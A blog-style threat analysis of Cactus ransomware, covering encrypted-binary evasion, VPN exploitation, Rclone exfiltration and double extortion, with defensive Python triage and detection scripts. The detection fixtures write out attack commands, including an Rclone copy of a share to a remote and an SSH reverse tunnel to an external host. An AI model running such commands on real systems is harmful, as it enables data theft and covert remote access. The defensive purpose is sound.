Cactus ransomware: a thorny new cybersecurity threat

The Cactus ransomware, a relatively new player in the cyberthreat arena, is causing growing concern among security experts. Like most modern ransomware it both steals data and encrypts files, but it stands out for the way it hides its own encryptor: the binary ships in encrypted form and only runs when the attacker supplies a key, which keeps it away from antivirus engines and sandboxes. Cactus focuses primarily on large commercial organizations. This targeted approach and its evasion method make it particularly dangerous. A better understanding of the threat posed by Cactus ransomware and of its operational tactics will help you develop prevention strategies against such attacks.

The recent emergence and significant impact of Cactus Ransomware

First identified in March 2023, Cactus ransomware quickly attracted attention due to its unusual approach and its choice of targets. Cactus primarily targets large commercial entities, especially those exposing remote access services. This choice is deliberate: such companies hold sensitive data, can afford large ransoms, and are therefore prime targets for cybercriminals.

These organizations are particularly exposed to Cactus because of their dependence on remote-access infrastructure. Cactus exploits known vulnerabilities in VPN appliances to enter these networks and carry out its operations. At the time of the first analyses, Cactus did not appear to operate a data leak site, which made its activity harder to track from the outside and its victims harder to count.

Cactus’ ability to exploit VPN vulnerabilities and infiltrate networks undetected increases the risk of major disruption and financial loss for affected businesses.

Technical analysis of the Cactus ransomware

Cactus stands out for two things: it encrypts its own binary, and it exploits VPN vulnerabilities to reach its targets' networks. On a compromised host, a batch script uses the 7-Zip tool to unpack the encryptor from an archive, deletes the archive and then launches the binary. Because the encryptor never sits on disk in a form that security software can analyze on its own, it slips more easily under the radar of common security products.

1. Encryption of its own binary

Cactus ransomware encrypts its own binary to protect it from antivirus software and sandboxes. The unpacked executable is useless on its own: it needs an AES key, passed on the command line by the attacker, to decrypt its configuration and the RSA public key it uses for file encryption. It deploys itself via a batch script, then deletes the original ZIP archive. Without the key, a sample recovered from disk does nothing when detonated, which makes the ransomware difficult for traditional security tools to detect and for analysts to study.

2. File extension modifications and encryption process

Once executed, the ransomware renames the targeted files with the extension “.CTS0” while encryption is in progress and “.CTS1” once encryption is complete. For file encryption, Cactus relies on an AES key known only to the attackers; that key decrypts the ransomware's configuration file and the RSA public key used to encrypt the files, so the binary cannot run without it. Cactus also has a quick mode; when it is run in quick mode and then in normal mode, files are encrypted twice and receive a new extension after each pass (for example .CTS1.CTS7).
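The following script is an added example, not code from the article, from Kroll or from SOS Ransomware. It shows how an incident responder can use the extension pattern described above (.CTS0 during encryption, .CTS1 afterwards, a second .CTSn suffix when quick and normal mode both ran) to scope an incident: it walks a directory tree, classifies every file by its Cactus suffix chain and returns a verdict. The sample tree it builds in a temporary directory, and the file names in it, are constructed for the example.

```python
"""Triage helper for the .CTS0 / .CTS1 / .CTS1.CTS7 extension pattern.

Added example (not from the article, Kroll or SOS Ransomware). The sample
tree and its file names are constructed; the extension semantics follow the
text above: .cts0 = encryption in progress, .cts1 = encrypted, two suffixes
= quick mode followed by normal mode.
"""
import os
import re
import tempfile
from collections import Counter

# One or more trailing .ctsN suffixes, case-insensitive, e.g. ".cts1" or ".cts1.cts7".
CTS_CHAIN = re.compile(r"((?:\.cts\d+)+)$", re.IGNORECASE)


def classify(name):
    """Return (original_name, state) for one file name.

    state is None for files without a Cactus suffix, otherwise one of
    "in_progress" (.cts0), "encrypted" (.cts1), "double" (two or more .ctsN
    suffixes) or "unknown" (some other .ctsN value).
    """
    m = CTS_CHAIN.search(name)
    if not m:
        return name, None
    suffixes = [s for s in m.group(1).lower().split(".") if s]
    original = name[: m.start()]
    if len(suffixes) >= 2:
        return original, "double"
    if suffixes[0] == "cts0":
        return original, "in_progress"
    if suffixes[0] == "cts1":
        return original, "encrypted"
    return original, "unknown"


def scan_tree(root):
    """Walk root; return a Counter of states and a list of (path, original, state)."""
    counts, hits = Counter(), []
    for dirpath, _, files in os.walk(root):
        for f in files:
            original, state = classify(f)
            if state:
                counts[state] += 1
                hits.append((os.path.join(dirpath, f), original, state))
    return counts, hits


def verdict(counts):
    """Summarize what the extension mix says about the state of the attack."""
    if not counts:
        return "no Cactus-style extensions found"
    if counts["in_progress"]:
        return "encryption appears to be IN PROGRESS: isolate the host now"
    if counts["double"]:
        return "files carry two Cactus suffixes: quick and normal mode both ran"
    return "encryption appears complete"


def build_sample_tree(root):
    """Constructed fixture: a few files in the states the text describes."""
    names = ["q1.xlsx.cts1", "plan.docx.cts1", "db.bak.cts0",
             "notes.txt.cts1.cts7", "readme.md"]
    for n in names:
        with open(os.path.join(root, n), "wb") as fh:
            fh.write(b"x")  # content is irrelevant to the triage
    return names


def demo():
    """Build the constructed tree in a temp dir, scan it, return (counts, verdict, hits)."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_tree(d)
        counts, hits = scan_tree(d)
        return dict(counts), verdict(counts), len(hits)


if __name__ == "__main__":
    counts, v, n = demo()
    print(n, "Cactus-named files:", counts)
    print("verdict:", v)
```

Run it against a real share (scan_tree on the mount point) only after the host has been isolated; the "in_progress" verdict means the encryptor may still be running.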

3. Exploitation of VPN vulnerabilities

Cactus exploits known, already-patched vulnerabilities in VPN appliances to gain initial access to the victim's network. Once inside, the attackers create a scheduled task to keep persistent access and install an SSH backdoor that they can later reach from a command and control server.


Cactus Ransomware operational tactics

1. Unauthorized access and network infiltration

Cactus ransomware uses unauthorized access techniques to infiltrate corporate networks. By exploiting VPN vulnerabilities, it gains access to target systems without arousing suspicion. Once inside, it spreads laterally, exploiting weaknesses in network security, weak passwords or out-of-date software to take control of several machines. This ability to move discreetly within networks makes it particularly formidable.

2. Using legitimate tools for malicious purposes

Cactus stands out for its use of legitimate tools to carry out its malicious activities. It relies on scheduled tasks to establish persistence on infected systems, so that it can continue its operations after a reboot, and on the Rclone synchronization tool to copy stolen data to attacker-controlled storage. Because these tools are also used by administrators, the activity blends in with normal operations, making detection and eradication of the ransomware more difficult for IT security teams.

3. Data exfiltration and double extortion tactics

Before encrypting files, Cactus ransomware exfiltrates sensitive data from compromised systems. This stolen data is then used as leverage to further extort victims or to be sold on the dark web. In addition to demanding a ransom for data decryption, cybercriminals threaten to leak or sell the stolen information if the ransom is not paid, a well-known double extortion tactic. This approach increases the pressure on victims and makes security incident management even more complex.
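The detection logic below is an added example, not code from the article, from Kroll or from SOS Ransomware. It covers the chain described in the three sections above: 7-Zip unpacking a payload into a staging directory, a binary launched with the AES key on its command line (Kroll reports Cactus takes it through the -i switch), a scheduled task pointing at that staging directory, an Rclone transfer to a configured remote, and an SSH reverse tunnel. The event records are constructed to resemble simplified Windows Security events (4688 process creation, 4698 scheduled task created); the field names, host names, paths, task name and key value are assumptions of this example, not a real log schema or real indicators.

```python
"""Detection logic for the Cactus TTP chain described above.

Added example (not from the article, Kroll or SOS Ransomware). EVENTS is
constructed telemetry in a simplified Windows Security log shape; every
host, path, user, task name and key value in it is invented.
"""
import re
from collections import defaultdict

# Constructed sample telemetry (assumed schema: id, host, user, image/cmdline or
# task/command/arguments). The last two records are benign noise on another host.
EVENTS = [
    {"id": 4688, "host": "srv-fs01", "user": "CORP\\svc_vpn",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c C:\\ProgramData\\f1.bat"},
    {"id": 4688, "host": "srv-fs01", "user": "CORP\\svc_vpn",
     "image": "C:\\ProgramData\\7z.exe",
     "cmdline": "7z.exe x C:\\ProgramData\\pkg.zip -pSecret1 -oC:\\ProgramData"},
    {"id": 4688, "host": "srv-fs01", "user": "CORP\\svc_vpn",
     "image": "C:\\ProgramData\\ntuser.dat.exe",
     "cmdline": "C:\\ProgramData\\ntuser.dat.exe -i 0123456789abcdef0123456789abcdef"},
    {"id": 4698, "host": "srv-fs01", "user": "CORP\\svc_vpn",
     "task": "\\Updates Check Task",
     "command": "C:\\ProgramData\\ntuser.dat.exe", "arguments": "-r"},
    {"id": 4688, "host": "srv-fs01", "user": "CORP\\svc_vpn",
     "image": "C:\\Users\\Public\\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Shares\\Finance remote:bk --transfers 32"},
    {"id": 4688, "host": "srv-fs01", "user": "CORP\\svc_vpn",
     "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:3389 user@203.0.113.10"},
    {"id": 4688, "host": "ws-042", "user": "CORP\\jdoe",
     "image": "C:\\Program Files\\7-Zip\\7z.exe",
     "cmdline": "7z.exe a C:\\Users\\jdoe\\Documents\\report.zip report.docx"},
    {"id": 4688, "host": "ws-042", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -i C:\\Users\\jdoe\\.ssh\\id_ed25519 jdoe@git.corp.example"},
]

# Writable locations where a dropped payload typically lives (assumed list).
SUSPECT_DIRS = ("\\programdata\\", "\\users\\public\\", "\\temp\\", "\\appdata\\local\\")
# "-i" followed by a long hex string: the key handed to the encryptor. The length
# requirement keeps "ssh -i <keyfile>" from matching.
KEY_SWITCH = re.compile(r"(?:^|\s)-i\s+[0-9a-fA-F]{32,}(?:\s|$)")
# An rclone remote looks like "name:path"; a Windows drive "D:\..." is excluded.
RCLONE_REMOTE = re.compile(r"\s[A-Za-z][\w-]*:(?!\\)")


def in_suspect_dir(text):
    return any(d in text.lower() for d in SUSPECT_DIRS)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Rules for 4688 process-creation records; returns [(rule, detail), ...]."""
    exe, cmd = basename(ev["image"]), ev["cmdline"]
    out = []
    if exe == "7z.exe" and re.search(r"\s[xe]\s", cmd) and in_suspect_dir(cmd):
        out.append(("staging", "7-Zip unpacking into a staging directory: " + cmd))
    if exe != "7z.exe" and KEY_SWITCH.search(cmd) and in_suspect_dir(ev["image"]):
        out.append(("encryptor", "binary in staging dir launched with -i <hex key>: " + cmd))
    if exe == "rclone.exe" and re.search(r"\s(copy|sync|move)\s", cmd) and RCLONE_REMOTE.search(cmd):
        out.append(("exfil", "rclone transfer to a configured remote: " + cmd))
    if exe == "ssh.exe" and re.search(r"\s-R\s", cmd):
        out.append(("tunnel", "ssh reverse tunnel (-R) to an external host: " + cmd))
    return out


def check_task(ev):
    """Rule for 4698 records: persistence via a task that runs from a staging directory."""
    if in_suspect_dir(ev["command"]):
        return [("persistence", f"scheduled task {ev['task']} runs {ev['command']} {ev['arguments']}")]
    return []


def detect(events):
    """Apply all rules; return a flat list of findings tagged with host and user."""
    findings = []
    for ev in events:
        if ev["id"] == 4688:
            hits = check_process(ev)
        elif ev["id"] == 4698:
            hits = check_task(ev)
        else:
            hits = []
        for rule, detail in hits:
            findings.append({"host": ev["host"], "user": ev["user"], "rule": rule, "detail": detail})
    return findings


def hosts_with_chain(findings, min_stages=2):
    """Hosts on which at least min_stages distinct stages of the chain fired."""
    stages = defaultdict(set)
    for f in findings:
        stages[f["host"]].add(f["rule"])
    return {h for h, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    found = detect(EVENTS)
    for f in found:
        print(f"[{f['rule']:<11}] {f['host']} {f['user']}: {f['detail']}")
    print("hosts showing a multi-stage chain:", sorted(hosts_with_chain(found)))
```

Each rule on its own is noisy (administrators do run 7-Zip, Rclone and SSH), which is why the verdict is per host and requires several stages to fire; the benign records on ws-042 produce no finding at all.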

In their May 2023 report, researchers at Kroll Cyber Threat Intelligence drew up a diagram to provide a better understanding of the Cactus binary execution process.

[Figure: The Cactus ransomware execution flow. (credit: Kroll)]

Prevention and mitigation strategies

1. Importance of regular patch management

Regular patch management is crucial to protecting networks against ransomware like Cactus. As Kroll's analysis shows, Cactus exploits documented vulnerabilities in VPN appliances (Fortinet devices in the cases Kroll investigated) to gain access to networks. Keeping systems and software up to date closes these known security flaws and removes the initial access path.

2. Network monitoring and penetration testing

Continuous network monitoring is essential to detect suspicious activity. Regular penetration testing can also help identify vulnerabilities before an attacker does. Since Cactus relies on legitimate tools such as 7-Zip, Rclone, scheduled tasks and SSH, effective monitoring should flag unusual use of these tools and other anomalies, enabling rapid intervention.

3. Recommendations for companies and individuals

For companies:

  1. Regular updates and patches: Make sure all systems and software are up to date to avoid exploitable vulnerabilities.
  2. Employee training: Make your staff aware of security risks, including phishing techniques and other social engineering methods.
  3. Regular backups: Make regular backups and ensure they are stored offline or in a secure environment.

For individuals:

  1. Security updates: Keep your devices and software up to date to protect against known vulnerabilities.
  2. Online caution: Be alert to suspicious e-mails and links, and use reliable antivirus solutions.
  3. Backups: Regularly back up your important data to external disks or secure cloud services.

Cactus ransomware represents a sophisticated and evolving threat in the cyberthreat landscape. Its ability to exploit VPN vulnerabilities, use legitimate tools for malicious activities, and carry out double extortion attacks makes it a formidable adversary for the organizations it targets. The best defense against threats like Cactus remains a combination of proactive measures: patching, monitoring and tested offline backups.

For help in the event of an attack, don’t hesitate to consult our data recovery experts. SOS Ransomware can help you restore your files and prevent future Cactus ransomware attacks.

To find out more: a deep dive into Cactus ransomware

SecurityScorecard’s technical analysis of Cactus ransomware

Update 30.01.2024:

Cactus stings again! Schneider Electric is the latest French victim. Read our latest article to follow the evolution of these attacks and stay informed about the persistent threat of Cactus.

